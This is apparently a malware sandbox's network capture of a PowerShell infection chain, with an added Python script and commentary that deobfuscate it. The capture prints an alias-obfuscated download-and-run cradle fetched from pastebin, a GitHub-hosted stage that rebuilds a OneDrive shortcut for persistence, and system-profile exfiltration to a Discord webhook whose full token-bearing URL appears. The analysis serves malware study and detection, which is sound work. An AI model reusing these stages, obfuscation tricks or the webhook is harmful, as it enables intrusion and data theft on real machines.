Oct 15, 2024 15:53:25.267227888 CEST | 246 | IN | Data Raw: 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32
Data Ascii: raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49703 | 185.199.111.133 | 80 | 7756 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:53:26.361634016 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 15:53:26.966737986 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:53:26 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120044-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000407.901962,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 13:58:26 GMT
Vary: Authorization,Accept-Encoding


Session ID: 2  Source IP: 192.168.2.10  Source Port: 49712  Destination IP: 104.20.3.235  Destination Port: 80  PID: 2040  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: Oct 15, 2024 15:53:51.904943943 CEST  Bytes transferred: 169  Direction: OUT
GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive

Timestamp: Oct 15, 2024 15:53:52.548341036 CEST  Bytes transferred: 472  Direction: IN
HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:53:52 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 14:53:52 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d304c3ecdc03ac7-DFW
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID: 3  Source IP: 192.168.2.10  Source Port: 49714  Destination IP: 185.199.111.133  Destination Port: 80  PID: 2040  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: Oct 15, 2024 15:53:53.384794950 CEST  Bytes transferred: 222  Direction: OUT
GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive

Timestamp: Oct 15, 2024 15:53:53.986255884 CEST  Bytes transferred: 541  Direction: IN
HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:53:53 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210074-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000434.920436,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 13:58:53 GMT
Vary: Authorization,Accept-Encoding


Session ID: 4  Source IP: 192.168.2.10  Source Port: 49716  Destination IP: 172.67.19.24  Destination Port: 80  PID: 5024  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: Oct 15, 2024 15:53:59.727513075 CEST  Bytes transferred: 169  Direction: OUT
GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive

Timestamp: Oct 15, 2024 15:54:00.333002090 CEST  Bytes transferred: 472  Direction: IN
HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:54:00 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 14:54:00 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d304c6f9ca22c89-DFW
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID: 5  Source IP: 192.168.2.10  Source Port: 49718  Destination IP: 185.199.111.133  Destination Port: 80  PID: 5024  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: Oct 15, 2024 15:54:01.603790045 CEST  Bytes transferred: 222  Direction: OUT
GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive

Timestamp: Oct 15, 2024 15:54:02.209845066 CEST  Bytes transferred: 541  Direction: IN
HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:54:02 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210042-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000442.144902,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 13:59:02 GMT
Vary: Authorization,Accept-Encoding


Session ID: 0  Source IP: 192.168.2.10  Source Port: 49702  Destination IP: 104.20.3.235  Destination Port: 443  PID: 7756  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-10-15 13:53:26 UTC  Bytes transferred: 169  Direction: OUT
GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive

Timestamp: 2024-10-15 13:53:26 UTC  Bytes transferred: 396  Direction: IN
HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 13:53:26 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 56
Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
Server: cloudflare
CF-RAY: 8d304b9add1f2ccc-DFW

Timestamp: 2024-10-15 13:53:26 UTC  Bytes transferred: 139  Direction: IN
Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)

Timestamp: 2024-10-15 13:53:26 UTC  Bytes transferred: 5  Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
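The pastebin stage in session 0 above arrives with chunked transfer encoding, and its outer call is written with aliases (calliT, WINDOWS_NT) instead of cmdlet names, so neither Invoke-Expression nor Invoke-WebRequest appears on the wire. In PowerShell `sal` is Set-Alias and `$env:os` is Windows_NT on every Windows host, so `sal $env:os iWr` defines an alias literally named WINDOWS_NT for Invoke-WebRequest. The following Python is an added example, not part of the Joe Sandbox report and not the actor's code: it decodes the chunked body from the Data Raw hex above, folds the "a"+"b" concatenation back into the GitHub URL, and resolves the aliases. The `sal $env:os iWr` definition is visible in the decimal UTF-16LE array carried in the session 1 payload (its third Data Raw chunk), from which LNK_ARGS_FRAGMENT is copied; `sal callit iEx` is cut at that chunk boundary on the page (only "allit iEx;" survives) and is assumed here. Function and variable names are my own.

```python
import re

# Copied from session 0 above: the 200 OK body as two HTTP chunks,
# "85\r\n" + 133 payload bytes + "\r\n", then the "0\r\n\r\n" terminator.
CHUNK_HEX = (
    "38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 "
    "22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 "
    "22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 "
    "75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 "
    "65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a 30 0d 0a 0d 0a"
)

# Copied from the session 1 payload (third Data Raw chunk): part of the decimal
# UTF-16LE byte array that carries the rebuilt shortcut's argument string.
LNK_ARGS_FRAGMENT = (
    "97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,"
    "101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,"
    "105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0"
)

# Alias definitions.  "sal $env:os iWr" is visible in LNK_ARGS_FRAGMENT; "sal callit iEx"
# is cut at the chunk boundary on the page (only "allit iEx;" survives) and is ASSUMED here.
ALIAS_DEFS = "sal callit iEx; sal $env:os iWr"

# Default aliases that ship with PowerShell and that the stage ultimately relies on.
BUILTIN_ALIASES = {"iex": "Invoke-Expression", "iwr": "Invoke-WebRequest"}


def decode_chunked(body: bytes) -> bytes:
    """Strip HTTP/1.1 chunked transfer encoding: <hex size>CRLF<data>CRLF ... 0CRLFCRLF."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last chunk; trailer section not needed here
        out += body[pos:pos + size]
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk not terminated by CRLF")
        pos += size + 2


def decode_utf16_array(csv: str) -> str:
    """The stage embeds its LNK as decimal bytes; the argument string inside is UTF-16LE."""
    return bytes(int(v) for v in csv.split(",")).decode("utf-16-le")


def parse_aliases(defs: str, env: dict[str, str]) -> dict[str, str]:
    """Map alias name -> target for every Set-Alias (sal) statement, expanding $env:NAME."""
    aliases = {}
    for name, target in re.findall(r"\bsal\s+([^\s;]+)\s+([^\s;]+)", defs, flags=re.I):
        name = re.sub(r"\$env:(\w+)", lambda m: env[m.group(1).lower()], name, flags=re.I)
        aliases[name.lower()] = target.lower()  # PowerShell names are case-insensitive
    return aliases


def fold_concat(ps: str) -> str:
    """"a"+"b" -> "ab": the split only exists to keep the URL out of string scanners."""
    return re.sub(r'"\s*\+\s*"', "", ps)


def resolve_aliases(ps: str, aliases: dict[str, str]) -> str:
    """Rewrite bare words that are aliases to their cmdlet names."""
    def repl(m: re.Match) -> str:
        target = aliases.get(m.group(0).lower())
        return m.group(0) if target is None else BUILTIN_ALIASES.get(target, target)
    return re.sub(r"[A-Za-z_][A-Za-z0-9_]*", repl, ps)


def deobfuscate(chunk_hex: str, alias_defs: str, env: dict[str, str]) -> dict:
    """Chunked hex -> stage text -> folded strings -> alias-resolved command, plus any URLs."""
    stage = decode_chunked(bytes.fromhex(chunk_hex)).decode("ascii")
    folded = fold_concat(stage)
    return {
        "stage": stage,
        "resolved": resolve_aliases(folded, parse_aliases(alias_defs, env)),
        "urls": re.findall(r'"([^"]+)"', folded),
    }


if __name__ == "__main__":
    result = deobfuscate(CHUNK_HEX, ALIAS_DEFS, {"os": "Windows_NT"})
    print(result["resolved"])
    print(decode_utf16_array(LNK_ARGS_FRAGMENT))
```

The resolved form reads `Invoke-Expression(Invoke-WebRequest ("raw.githubusercontent.com/...gaber.txt") -usebasicparsing)`, which is the plain download-and-run cradle; the alias layer is what keeps command-line and script-block scanners from seeing those two cmdlet names. Because the alias map is derived from `sal` statements rather than hard-coded, the same resolver works for the next variant that picks different alias names.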


Session ID: 1  Source IP: 192.168.2.10  Source Port: 49704  Destination IP: 185.199.111.133  Destination Port: 443  PID: 7756  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-10-15 13:53:27 UTC  Bytes transferred: 222  Direction: OUT
GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive

Timestamp: 2024-10-15 13:53:27 UTC  Bytes transferred: 901  Direction: IN
HTTP/1.1 200 OK
Connection: close
Content-Length: 7508
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:53:27 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210028-DFW
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1729000408.654210,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: ad4ed0774367fab2607d71d24a1079e4b77d309a
Expires: Tue, 15 Oct 2024 13:58:27 GMT
Source-Age: 55
                                                                              2024-10-15 13:53:27 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                              Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                              2024-10-15 13:53:27 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                              2024-10-15 13:53:27 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                              2024-10-15 13:53:27 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                              2024-10-15 13:53:27 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                              Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                              2024-10-15 13:53:27 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                              Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


Session ID: 2  Source IP: 192.168.2.10  Source Port: 49711  Destination IP: 162.159.137.232  Destination Port: 443  PID: 7756  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-10-15 13:53:51 UTC  Bytes transferred: 311  Direction: OUT
POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/json
Host: discord.com
Content-Length: 294
Connection: Keep-Alive
                                                                              2024-10-15 13:53:51 UTC294OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 62 72 6f 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 56 45 4e 55 47 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41 4c 53
                                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** VENUG\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FALS
Timestamp: 2024-10-15 13:53:52 UTC  Bytes transferred: 1362  Direction: IN
HTTP/1.1 204 No Content
Date: Tue, 15 Oct 2024 13:53:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
set-cookie: __dcfduid=e939394e8afc11ef9fb26626db264c29; Expires=Sun, 14-Oct-2029 13:53:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1729000433
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
